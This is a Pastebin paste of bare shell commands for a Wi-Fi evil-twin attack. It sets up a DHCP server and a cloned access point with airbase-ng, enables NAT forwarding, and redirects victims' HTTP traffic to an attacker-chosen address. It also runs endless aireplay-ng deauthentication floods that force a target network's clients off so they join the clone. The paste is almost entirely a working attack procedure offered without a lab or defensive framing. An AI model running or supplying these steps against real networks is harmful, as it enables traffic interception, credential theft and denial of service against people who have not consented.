Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Commands:
- Install dhcp3 and create config file:
- apt-get install dhcp3-server -y
- mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
- gedit /etc/dhcp3/dhcpd.conf
- /etc/dhcp3/dhcpd.conf:
- ddns-update-style ad-hoc;
- default-lease-time 600;
- max-lease-time 7200;
- subnet 192.168.2.128 netmask 255.255.255.128 {
- option subnet-mask 255.255.255.128;
- option broadcast-address 192.168.2.255;
- option routers 192.168.2.129;
- option domain-name-servers 8.8.8.8;
- range 192.168.2.130 192.168.2.140
- }
- Start clone access point:
- airmon-ng start wlan0 [channel]
- airbase-ng -e "AP name" -c [channel] -a mon0
- ifconfig at0 up
- ifconfig at0 192.168.2.129 netmask 255.255.255.128
- route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
- dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
- /etc/init.d/dhcp3-server start
- Flush iptables:
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables --table nat --append POSTROUTING --out-interface [internet connection] -j MASQUERADE
- iptables --append FORWARD --in-interface at0 -j ACCEPT
- echo 1 > /proc/sys/net/ipv4/ip_forward
- Redirect traffic:
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP address:80]
- iptables -t nat -A POSTROUTING -j MASQUERADE
- DeAuthenticate Access Point (poor):
- aireplay-ng -0 0 -a [target bssid] [monitor interface]
- DeAuthenticate Client (recommended):
- aireplay-ng -0 0 -a [target bssid] -c [client mac] [monitor interface]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement